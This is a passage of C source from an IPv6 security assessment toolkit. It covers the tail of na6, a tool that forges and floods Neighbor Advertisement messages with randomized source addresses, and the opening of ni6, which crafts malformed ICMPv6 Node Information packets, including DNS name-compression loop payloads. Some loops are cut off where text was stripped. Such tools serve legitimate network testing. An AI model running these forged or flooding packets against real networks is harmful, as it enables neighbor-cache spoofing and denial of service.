a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_neighbor_advert)) > (v6buffer+max_packet_size)){ puts("Packet too large while inserting Neighbor Advertisement header (should be using Frag. option?)"); exit(EXIT_FAILURE); } na= (struct nd_neighbor_advert *) ptr; na->nd_na_type = ND_NEIGHBOR_ADVERT; na->nd_na_code = 0; na->nd_na_flags_reserved = router_f | solicited_f | override_f; na->nd_na_target = targetaddr; ptr += sizeof(struct nd_neighbor_advert); if(tllaopt_f && nlinkaddr==1){ if( (ptr+sizeof(struct nd_opt_tlla)) <= (v6buffer+max_packet_size) ){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; bcopy(linkaddr[0].a, tllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); } else{ puts("Packet Too Large while processing target link-layer address option"); exit(EXIT_FAILURE); } } startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the Neighbor Advertisement Message, and * send the attack packet(s). */ int send_packet(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata){ if(pktdata == NULL){ sources=0; } else{ /* Sending a response to a Neighbor Solicitation message */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ns = (struct nd_neighbor_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); na->nd_na_flags_reserved = router_f | solicited_f | override_f; if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ if ( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ puts("inetr_pton(): Error converting all-nodes multicast address"); return(FAILURE); } if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(ethernet->dst), ETHER_ADDR_LEN) == 0){ puts("ether_pton(): Error converting all-nodes link-local address"); return(FAILURE); } } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; /* Set the "Solicited" flag if NS was sent from an address other than the unspecified address (i.e., the response will be unicast). */ na->nd_na_flags_reserved = na->nd_na_flags_reserved | ND_NA_FLAG_SOLICITED; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* If the Neighbor Solicitation message was directed to a unicast address (unlikely), the IPv6 Source Address and the Ethernet Source Address of the Neighbor Advertisement are set to the IPv6 Destination Address and the Ethernet Destination Address of the incoming Neighbor Solicitation, respectively. Otherwise, the IPv6 Source Address is set to the ND Target Address (unless a specific IPv6 Source Address was specified with the "-s" option), and the Ethernet is set to that specified by the "-S" option (or randomized). */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ if( !idata->srcaddr_f && ((pkt_ns->nd_ns_target.s6_addr16[0] & htons(0xffc0)) == htons(0xfe80)) ) ipv6->ip6_src = pkt_ns->nd_ns_target; else ipv6->ip6_src = idata->srcaddr; ethernet->src = idata->hsrcaddr; sources=0; multicastdst_f=1; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; ethernet->src = pkt_ether->dst; sources=nsources; multicastdst_f=0; } na->nd_na_target= pkt_ns->nd_ns_target; } do{ if(floods_f && (pktdata==NULL || (pktdata != NULL && multicastdst_f))){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and prefix length. */ startrand= idata->srcpreflen/16; for(i=0; iip6_src.s6_addr16[i]= 0; for(i=startrand; i<8; i++) ipv6->ip6_src.s6_addr16[i]=random(); if(idata->srcpreflen%16){ mask=0xffff; for(i=0; i<(idata->srcpreflen%16); i++) mask= mask>>1; ipv6->ip6_src.s6_addr16[startrand]= ipv6->ip6_src.s6_addr16[startrand] \ & htons(mask); } for(i=0; i<=(idata->srcpreflen/16); i++) ipv6->ip6_src.s6_addr16[i]= ipv6->ip6_src.s6_addr16[i] | idata->srcaddr.s6_addr16[i]; if(!idata->hsrcaddr_f){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); } if(tllaopt_f && !tllaopta_f){ bcopy(ethernet->src.a, tllaopt->address, ETH_ALEN); } } targets=0; do{ if(floodt_f){ /* Randomizing the ND Target Address based on the prefix specified by "targetaddr" and targetpreflen. */ startrand= targetpreflen/16; for(i=0; ind_na_target.s6_addr16[i]= 0; for(i=startrand; i<8; i++) na->nd_na_target.s6_addr16[i]=random(); if(targetpreflen%16){ mask=0xffff; for(i=0; i<(targetpreflen%16); i++) mask= mask>>1; na->nd_na_target.s6_addr16[startrand]= na->nd_na_target.s6_addr16[startrand] \ & htons(mask); } for(i=0; i<=(targetpreflen/16); i++) na->nd_na_target.s6_addr16[i]= na->nd_na_target.s6_addr16[i] | \ targetaddr.s6_addr16[i]; } /* * If a single target link-layer address option is to be included, it is included * by init_packet_data() */ if(nlinkaddr==1) linkaddrs=1; else linkaddrs=0; do{ newdata_f=0; ptr=startofprefixes; while(linkaddrstype= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; bcopy(linkaddr[linkaddrs].a, tllaopt->address, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); linkaddrs++; newdata_f=1; } na->nd_na_cksum = 0; na->nd_na_cksum = in_chksum(v6buffer, na, ptr-((unsigned char *)na), IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + ETHER_HDR_LEN); fptrend = fptr + ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); return(FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n"\ , (LUI) nw, (LUI) (ptr-buffer)); return(FAILURE); } } } }while(linkaddrs\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(floodt_f) printf("Flooding the target with %u ND Target Addresses\n", ntargets); if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); } if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } /* IPv6 Destination Address is only used if a target IPv6 address or a target Ethernet * address were specified */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; i Address: %s\n", \ ((floods_f && !tllaopta_f)?"(randomized for each packet)":plinkaddr)); } } ipv6toolkit-1.5.1/tools/na6.h000066400000000000000000000000541223702747200160120ustar00rootroot00000000000000/* * Header file for the na6 tool * */ ipv6toolkit-1.5.1/tools/ni6.c000066400000000000000000002052111223702747200160170ustar00rootroot00000000000000/* * ni6: A security assessment tool that exploits potential flaws * in the processing of ICMPv6 Node Information messages * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: gcc ni6.c -Wall -lpcap -o ni6 * * This program has been tested to compile and run on: Debian GNU/Linux 6.0, * FreeBSD 8.2, NetBSD 5.1, OpenBSD 5.0, and Ubuntu 11.10. * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __linux__ #include #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #include #endif #include "ni6.h" #include "ipv6toolkit.h" #include "libipv6.h" #include #include /* Function prototypes */ void init_packet_data(struct iface_data *); int send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); int print_ni_data(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_addr(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_addr6(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_name(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_noop(struct iface_data *, const u_char *, struct pcap_pkthdr *); /* Variables used for learning the default router */ struct iface_data idata; struct ether_addr rs_ether; struct in6_addr rs_ipv6; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; struct icmp6_nodeinfo *pkt_ni; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; char domain[MAX_DOMAIN_LEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct icmp6_nodeinfo *ni; struct ether_header *ethernet; char *lasts, *rpref; char *charptr, *printname, *printnamed; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int nsleep; unsigned char srcpreflen; u_int16_t mask; u_int8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char iface_f=0; unsigned char rand_src_f=0, forgeether_f=0; unsigned char listen_f = 0, multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char srcprefix_f=0, hoplimit_f=0, flags_f=0, exceedp_f=0, snamedslabel_f=0; unsigned char floods_f=0, name_f=0, fname_f=0, ipv6addr_f=0, ipv4addr_f=0, maxlabel_f=0; unsigned char named_f=0, fnamed_f=0, ipv6addrd_f=0, ipv4addrd_f=0, exceedpd_f=0; unsigned char payloadsize_f=0, qtype_f=0, code_f=0, snameslabel_f=0, sloopattack_f=0; unsigned char dloopattack_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* ICMPv6 NI */ struct in_addr ipv4addr, ipv4addrd; struct in6_addr ipv6addr, ipv6addrd; unsigned int maxlabel, slvariant, slsize, dlvariant, dlsize; char *name, *named; unsigned int fnamelen, exceedp, fnamedlen, exceedpd, payloadsize; int namelen, namedlen; u_int8_t qtype, type; u_int8_t code=0; u_int16_t flags=0; unsigned char *slpointer, *dlpointer; struct filters filters; int main(int argc, char **argv){ extern char *optarg; int r, sel; fd_set sset, rset; time_t curtime, lastni=0, start=0; struct timeval timeout; /* For queries only: loops to the beginning of the same label (shouldn't work) */ unsigned char dnsloopq0[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x0c, 0x00}; /* For queries only: loops on a single byte label (shouldn't work) */ unsigned char dnsloopq1[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x0c, 0x05}; /* Loops to the beginning of the same label */ unsigned char dnsloopr0[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x0c, 0x04}; /* Loops on a single byte */ unsigned char dnsloopr1[]={0x04, 0x61, 0x61 , 0x61, 0x61, 0x0c, 0x09}; /* Loops to the beginning of a previous label */ unsigned char dnsloopr2[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x00, 0x03, 0x61 , 0x61, 0x61, 0x0c, 0x04}; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-addr", required_argument, 0, 's'}, {"dst-addr", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'c'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"payload-size", required_argument, 0, 'P'}, {"subject-ipv4", required_argument, 0, '4'}, {"subject-ipv6", required_argument, 0, '6'}, {"subject-name", required_argument, 0, 'n'}, {"subject-fname", required_argument, 0, 'N'}, {"subject-ename", required_argument, 0, 'x'}, {"subject-nloop", required_argument, 0, 'o'}, {"max-label-size", required_argument, 0, 'Z'}, {"sname-slabel", no_argument, 0, 'e'}, {"code", required_argument, 0, 'C'}, {"qtype", required_argument, 0, 'q'}, {"flags", required_argument, 0, 'X'}, {"data-ipv6", required_argument, 0, 'w'}, {"data-ipv4", required_argument, 0, 'W'}, {"data-name", required_argument, 0, 'a'}, {"data-fname", required_argument, 0, 'A'}, {"data-ename", required_argument, 0, 'Q'}, {"data-nloop", required_argument, 0, 'O'}, {"dname-slabel", no_argument, 0, 'E'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"forge-src-addr", no_argument, 0, 'r'}, {"forge-link-src-addr", no_argument, 0, 'R'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:c:u:U:H:y:S:D:P:4:6:n:N:x:o:Z:eC:q:X:w:W:a:A:Q:O:Ej:k:J:K:b:g:B:G:lz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option){ case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ srcpreflen = atoi(charptr); if(srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), srcpreflen); srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } type= ICMP6_NI_QUERY; idata.dstaddr_f = 1; break; case 'c': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case '6': /* Subject: IPv6 address */ if ( inet_pton(AF_INET6, optarg, &ipv6addr) <= 0){ puts("inet_pton(): Subject Address not valid"); exit(EXIT_FAILURE); } ipv6addr_f = 1; break; case '4': /* Subject: IPv4 address */ if( inet_pton(AF_INET, optarg, &ipv4addr) <= 0){ puts("inet_pton(): Subject Address not valid"); exit(EXIT_FAILURE); } ipv4addr_f = 1; break; case 'n': /* Subject: Name */ printname= optarg; namelen= strlen(optarg) + 1; if( (name=malloc(namelen + 1)) == NULL){ puts("Error allocating memory"); exit(EXIT_FAILURE); } if( (namelen=dns_str2wire(optarg, namelen, name, namelen+1)) == -1){ puts("inet_pton(): Error while converting name to DNS wire format"); exit(EXIT_FAILURE); } name_f = 1; break; case 'N': /* Subject: Name of an arbitrary length */ fnamelen= atoi(optarg); fname_f= 1; break; case 'x': /* Subject: DNS wire label that exceeeds packet size */ exceedp= atoi(optarg); exceedp_f= 1; break; case 'o': slvariant=atoi(optarg); sloopattack_f=1; break; case 'P': /* Payload Size */ payloadsize= atoi(optarg); payloadsize_f= 1; break; case 'w': /* Data: IPv6 address */ if ( inet_pton(AF_INET6, optarg, &ipv6addrd) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } ipv6addrd_f = 1; break; case 'W': /* Data: IPv4 address */ if( inet_pton(AF_INET, optarg, &ipv4addrd) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } ipv4addrd_f = 1; break; case 'a': /* Data: Name */ printnamed= optarg; namedlen= strlen(optarg) + 1; if( (named=malloc(namedlen + 1)) == NULL){ puts("Error allocating memory"); exit(EXIT_FAILURE); } if( (namedlen=dns_str2wire(optarg, namedlen, named, namedlen+1)) == -1){ puts("inet_pton(): Error while converting name to DNS wire format"); exit(EXIT_FAILURE); } named_f = 1; break; case 'A': /* Data: Name of an arbitrary length */ fnamedlen= atoi(optarg); fnamed_f= 1; break; case 'Q': /* Data: DNS wire label that exceeeds packet size */ exceedpd= atoi(optarg); exceedpd_f= 1; break; case 'O': dlvariant=atoi(optarg); dloopattack_f=1; break; case 'E': /* Data is a Single label name */ snamedslabel_f=1; break; case 'Z': /* Max DNS label size (defaults to 63) */ maxlabel= atoi(optarg); if(maxlabel < 1){ puts("Error: max-label-size too small"); exit(EXIT_FAILURE); } maxlabel_f= 1; break; case 'e': /* Subject is a Single label name */ snameslabel_f=1; break; case 'C': /* ICMPv6 code */ code= atoi(optarg); code_f= 1; break; case 'q': /* Qtype */ qtype= atoi(optarg); qtype_f= 1; break; case 'X': charptr = optarg; while(*charptr){ switch(*charptr){ case 'G': flags= flags | NI_NODEADDR_FLAG_GLOBAL; break; case 'S': flags= flags | NI_NODEADDR_FLAG_SITELOCAL; break; case 'L': flags= flags | NI_NODEADDR_FLAG_LINKLOCAL; break; case 'C': flags= flags | NI_NODEADDR_FLAG_COMPAT; break; case 'A': flags= flags | NI_NODEADDR_FLAG_ALL; break; case 'T': flags= flags | NI_NODEADDR_FLAG_TRUNCATE; break; case 'X': /* No flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } flags_f=1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); 